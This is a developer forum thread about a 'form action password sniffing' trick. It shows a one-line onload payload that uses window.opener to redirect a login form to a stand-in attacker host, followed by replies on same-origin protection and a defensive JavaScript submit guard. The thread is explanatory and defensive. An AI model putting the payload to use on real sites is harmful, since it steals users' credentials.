Bytes | Developer Community

form action password sniffing?

Security hole for dummies:

Let's say I have a login screen with a lot of advertisements (links).
One of those links is opened in a new window, and there is the following:

<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">

After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all, is submitted to a third party.
Is this old news? (I don't follow this kind of news too often.) Any comments,
fixes, anything?
Jul 20 '05 #1

Hi,

my 2 cents:

In the case you describe the pop-up stuff is probably hosted somewhere else, via
some advertising company (hate them).
I think all modern browsers don't allow JavaScript to do anything on a
window that is hosted from another server.

so: window1: http://www.serv1.com/page.htm
window2: http://www.serv2.com/page.htm

The script on window2 cannot access window1.

In that case you are safe.

If however both are hosted from the same server, your trick will work.
Just another good reason not to fill your own server with scripts from some
untrusted party.

Regards,
Erwin Moller

Jul 20 '05 #2
> I think all modern browsers don't allow javascript doing anything on a
window that is hosted from another server.
OK, that helps. I had only one host to test it on.

> If however both are hosted from the same server, your trick will work.

A good reason not to use any domains offering free web pages under the
same hostname. I wonder if there are any abuses of this trick?

Thanks for replying!
Jul 20 '05 #3
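Two browser-side controls now back Erwin's same-origin point from the server's end: `rel="noopener"` on outbound links leaves `window.opener` null in the new window, and a `Content-Security-Policy: form-action 'self'` header makes the browser refuse a form whose action was rewritten to another host. The block below is an added example, not code from this thread: a client-side submit guard that performs the same origin check the CSP directive enforces, so a login form whose action has been changed by the opener trick is never submitted off-origin; the helper names and the stubbed form object are assumptions of the example.

```javascript
// Added example (not from the thread). isSameOriginAction, guardLoginForm,
// makeStubForm and the `tampered` flag are names invented for it.
// True only if `action` resolves to the same scheme://host:port as `pageOrigin`.
// Relative actions ("login.php", "/auth") resolve against the page and pass; an
// absolute URL on another host, a protocol-relative "//host/...", or an
// opaque-origin scheme (javascript:, data:) is rejected.
function isSameOriginAction(action, pageOrigin) {
  let target;
  try {
    target = new URL(action, pageOrigin);
  } catch (e) {
    return false; // unparsable action: treat as tampered
  }
  return target.origin !== 'null' && target.origin === new URL(pageOrigin).origin;
}

// Attach the guard. `form` needs only .action and .addEventListener, so this
// works on a real HTMLFormElement or on the stub below.
function guardLoginForm(form, pageOrigin) {
  form.addEventListener('submit', function (event) {
    if (!isSameOriginAction(form.action, pageOrigin)) {
      event.preventDefault(); // never send the credentials off-site
      form.tampered = true;   // hook for logging or alerting
    }
  });
}

// Minimal stand-in for a form so the guard can be exercised outside a browser.
function makeStubForm(action) {
  const listeners = [];
  return {
    action,
    tampered: false,
    addEventListener(type, fn) { if (type === 'submit') listeners.push(fn); },
    submit() { // true when no listener blocked the submission
      let blocked = false;
      listeners.forEach(fn => fn({ preventDefault() { blocked = true; } }));
      return !blocked;
    },
  };
}

// Constructed scenario: login page on www.serv1.com, then a rogue window
// rewrites the action to the third-party host named in the first post.
const PAGE_ORIGIN = 'http://www.serv1.com';
const form = makeStubForm('/login.php');
guardLoginForm(form, PAGE_ORIGIN);
const beforeTamper = form.submit(); // true: same origin
form.action = 'http://www.hackerz.com/PasswordDatabase.php';
const afterTamper = form.submit();  // false: blocked, form.tampered is now true
```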
